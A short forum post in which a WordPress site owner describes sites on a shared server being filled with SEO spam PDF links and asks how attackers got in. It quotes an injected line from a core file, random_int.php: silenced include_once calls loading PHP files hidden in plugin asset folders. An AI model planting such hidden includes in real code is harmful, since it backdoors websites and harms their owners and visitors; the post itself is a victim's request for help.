I have had the same issue on a shared server and all my wordpress sites have been affected with this SEO spam PDF links.. So I have had to purchase a new server and created all the sites again from scratch! Taking me months..
I would love any advice as to how you think they might have got in?
found this line code in wp-includes/random_compat/random_int.php.
?><?php @include_once("/homepages/29/d169973226/htdocs/wp-content/plugins/fusion-core/admin/page-builder/assets/js/palette.php"); ?><?php @include_once("/homepages/29/d169973226/htdocs/wp-content/plugins/LayerSlider/static/codemirror/mode/htmlembedded/htmlembedded.php"); ?>
over 20,000 links to PDFs